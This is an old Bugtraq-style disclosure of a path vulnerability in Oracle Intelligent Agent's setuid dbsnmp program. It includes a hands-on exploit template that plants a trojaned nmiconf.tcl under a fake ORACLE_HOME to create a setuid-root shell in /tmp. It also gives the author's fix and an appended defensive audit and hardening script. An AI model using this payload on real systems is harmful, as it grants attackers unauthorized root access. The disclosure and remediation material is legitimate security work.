START OF BUGTRAQ POST

Oracle installations with the 'Oracle Intelligent Agent' installed have a path related vulnerability. The problem lies in the dbsnmp program located in $ORACLE_HOME/bin. This setuid root program calls a tcl script (nmiconf.tcl) located by default in $ORACLE_HOME/network/agent/config. The problem is that the dbsnmp script relies on an environment variable (the path to nmiconf.tcl) which can be set by a user. Therefore, intruders can force the script to execute a trojaned version of nmiconf.tcl which will run as root.

END OF BUGTRAQ POST

apparently, as we see from above, $ORACLE_HOME would need to be reset for this exploit to work properly. so lets do it. first of all, drop to a bourne or korn shell and do the following:

-------
# payload that the trojaned nmiconf.tcl runs
echo "cp /bin/sh /tmp/.sh ; chmod 4755 /tmp/.sh" > /tmp/.12345

# fake ORACLE_HOME tree containing the config dir dbsnmp looks in
mkdir -p /tmp/whatever/network/agent/config
export ORACLE_HOME=/tmp/whatever

cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*
set n [ system "/tmp/.12345" ]
EOF

# or even an exec call instead of system... whatever...
cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*
set n [ exec /tmp/.12345 ]
EOF
-------

mileage may vary widely with your OS and tcl version, so this is merely a template of the process involved... however all one needs to do to make this a reality is run the OLD dbsnmp program and you will spawn a root shell in /tmp called /tmp/.sh. execute the root shell and enjoy elevated privileges.

NOW FOR THE FIX: turn OFF the suid bit on the dbsnmp executable. theres no reason to have it set in the first place, as root should be the only user really allowed to run an SNMP paradigm anyways. duh

" ...it takes a good man to beat me... it just doesnt take very long."
.|.. ..|.
mujahadin
no extra charge for typos
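A defender-side audit for the two conditions the post depends on (a setuid dbsnmp and an nmiconf.tcl that someone other than its owner can rewrite), plus the fix the post recommends, as an added example that is not code from the original post or from Oracle. The paths are the ones the post names; the function names and the idea of passing ORACLE_HOME as an argument are assumptions of this example.

```shell
#!/bin/sh
# Added audit/remediation helper (not from the original post). Paths are
# the ones the post names; function names are assumptions of this example.

# Report the conditions the post relies on under the given ORACLE_HOME:
# a setuid dbsnmp binary and a group- or world-writable nmiconf.tcl.
# Prints one FINDING line per problem and returns the number of findings,
# so a nonzero status means "something to fix".
audit_oracle_agent() {
    home="$1"
    bin="$home/bin/dbsnmp"
    cfg="$home/network/agent/config/nmiconf.tcl"
    findings=0
    if [ -u "$bin" ]; then
        echo "FINDING: $bin has the setuid bit set"
        findings=$((findings + 1))
    fi
    if [ -f "$cfg" ]; then
        # POSIX find: -perm -002 = world-writable, -perm -020 = group-writable
        if [ -n "$(find "$cfg" \( -perm -002 -o -perm -020 \))" ]; then
            echo "FINDING: $cfg is writable by non-owners"
            findings=$((findings + 1))
        fi
    fi
    return "$findings"
}

# Apply the fix the post recommends (drop the setuid bit) and also close
# the writable-script hole so only the owner can change what dbsnmp runs.
harden_oracle_agent() {
    home="$1"
    chmod u-s "$home/bin/dbsnmp"
    chmod go-w "$home/network/agent/config/nmiconf.tcl"
}
```

Run `audit_oracle_agent "$ORACLE_HOME"` from cron or a config-management check; a nonzero exit is the signal to re-run `harden_oracle_agent`.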